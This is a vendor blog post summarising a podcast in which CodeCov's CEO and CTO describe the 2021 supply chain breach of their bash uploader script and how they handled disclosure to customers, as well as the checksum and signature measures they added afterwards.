Responsible disclosure: CodeCov CEO & CTO share learnings from the breach

Written by:

December 9, 2021

0 mins read

In January of 2021, CodeCov suffered a supply chain attack that exposed client environment variables. In the following months, the specifics of the breach and its technical applications have been thoroughly examined by the application security community to determine what went wrong and how to combat similar attacks in the future. But another interesting outcome of the breach were the insights into a slightly less glamorous topic: responsible disclosure.

In October 2021, CodeCov CEO Jerrod Engelberg and CTO Eli Hooten appeared on The Secure Developer podcast to give an insider’s perspective on the events. Their conversation with Guy shed light on what being at the center of an incident is like and raised interesting questions about how to best respond to similar incidents.

Listen to the full episode today

The CodeCov security incident

At the time of the incident, CodeCov used a curl|bash (a.k.a. “curl pipe bash”, “curl bash piping”, etc.) script to upload reports to its server, which was hosted in a `private write, public read` CDN bucket. The attacker was able to extract a credential from a compressed layer of CodeCov’s enterprise Docker image and access to the CDN bucket, where they made malicious alterations to the bash script. The altered script was pulled into the CI pipeline of every client that made a pull or merge request in the time between the breach and when the credentials were revoked. This allowed the attackers to infiltrate client environments where the CI was running, print the environment variables, and pipe them to a third-party server for later use.

The impact of this attack varied from one customer to the next. If the client managed their CI in a public repository, they likely had nothing of consequence stored in their environment variables. If however, the customer used a closed repository, where their CI interacts heavily with the tech stack and holds secret information, the breach was cause for serious concern.

As with any supply chain attack, the only certainty was that the information had been leaked. There was no way to know what the attackers planned to do with the stolen environment variables, which meant that the team had to act quickly and decisively.

The CodeCov response

CodeCov’s thesis for disclosure was summarized by Engelberg with: “If even one customer is not able to hear from us, and doesn't take the appropriate action, that's one customer too many.” In practice, however, this ethos became a challenge. When customers sign into CodeCov, they are given the option to do so with an email address or a social signer (like OAuth, Github, or Bitbucket) which keeps their contact information private. A convenient choice that later became a critical factor in the disclosure process.

For the customers who chose to make an account directly with CodeCov or disclose contact information, the solution was simple. Email notifications were sent out to every available address notifying customers of the breach and encouraging them to take action. Unfortunately, the majority of CodeCov users didn’t fit into this group. In response to this, the CodeCov team took all means necessary to reach every remaining customer.

Public disclosures were made after reporting the incident to federal authorities, announcements detailing the breach were promoted and signal boosted by tech media, and CodeCov flooded the application with notifications. While all reasonable measures were taken to ensure that their user base was notified, the circumstances that lead to their sweeping reaction are worth considering.

If CodeCov had required all users to disclose personal information like an email address, then reaching everyone post-breach would have been simple. Giving customers the option to utilize a social signer allowed them to keep their personal data more private, but also led to serious hurdles when urgent communication was needed. Would CodeCov’s disclosure process have looked different if notifying users was as simple as a mass email? Most likely not. As Hooten said, “I think you'll know you're doing it right, when the answer is obvious, even if the way ahead is painful or difficult.” The value structure at the core of CodeCov would have pushed its team toward transparency regardless.

Minimizing business impact through transparency

While no business can come out of a security incident completely unscathed, CodeCov was able to minimize the negative impact through persistent, transparent communication. But despite their quick action, there was some churn. As Engelberg explained, there were “customers that said, ‘Hey, we can't use you at this time.’ Or, champions of our product said, ‘Hey, I love using your product, but the moratorium has come down and I can't use [it anymore]’”. However, the loss of customers would have greatly increased without the transparency disclosure the team provided. Vulnerabilities are much easier to fix than broken trust.

Like Snyk, CodeCov is a developer-centered application — and developers need data, not spin. By sticking to the facts and asking for help from the larger security community, CodeCov maintained its credibility and commitment to developers even in the middle of a crisis.

"The best thing that you can do for that same industry that you love, for the same developers that you try to serve, is just step forward fearlessly."

Jerrod Engelberg

CEO, CodeCov

Beyond the breach

The CodeCov security breach revealed truths that extend far beyond a single incident. The nature of the attack highlights potential pitfalls that impact the industry as a whole. The largest being a baseline distribution problem. As open source software becomes increasingly vital to the development cycle, its inherent dependencies are piggybacked in. The benefits of open source are undeniable. The key is determining how we can utilize it safely.

When increasing security post-breach, CodeCov added measures like SHA checksums and signature verification. Users were encouraged to take advantage of these checks to ensure that the scripts they were pulling came from CodeCov directly. However, there is no way to mandate the use of these verifications. As Engelberg explained: “Until this is zero trust [...] there is always this handshake, right? We can make the handshake more and more sophisticated, but it's definitely something that I think a lot about as we move forward and what can come next.”

We can educate users on the potential risks and give them tools to audit the code, but we can't force anyone to take the extra steps. The handshake agreement between company and customer is deeply rooted in the culture of development. Our task as an industry is to determine the best plan for risk mitigation.

Want to learn more about the CodeCov breach and what it revealed about the industry? Head over to The Secure Developer to hear the full podcast. Engelberg and Hooten opened CodeCov’s doors and offered first hand insight on: in-house security prep, advice for CEOs/CTOs, how empathy altered the course of the crisis, and much more.

Patch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo Segment

Snyk is a developer security platform. Integrating directly into development tools, workflows, and automation pipelines, Snyk makes it easy for teams to find, prioritize, and fix security vulnerabilities in code, dependencies, containers, and infrastructure as code. Supported by industry-leading application and security intelligence, Snyk puts security expertise in any developer’s toolkit.

Start freeBook a live demo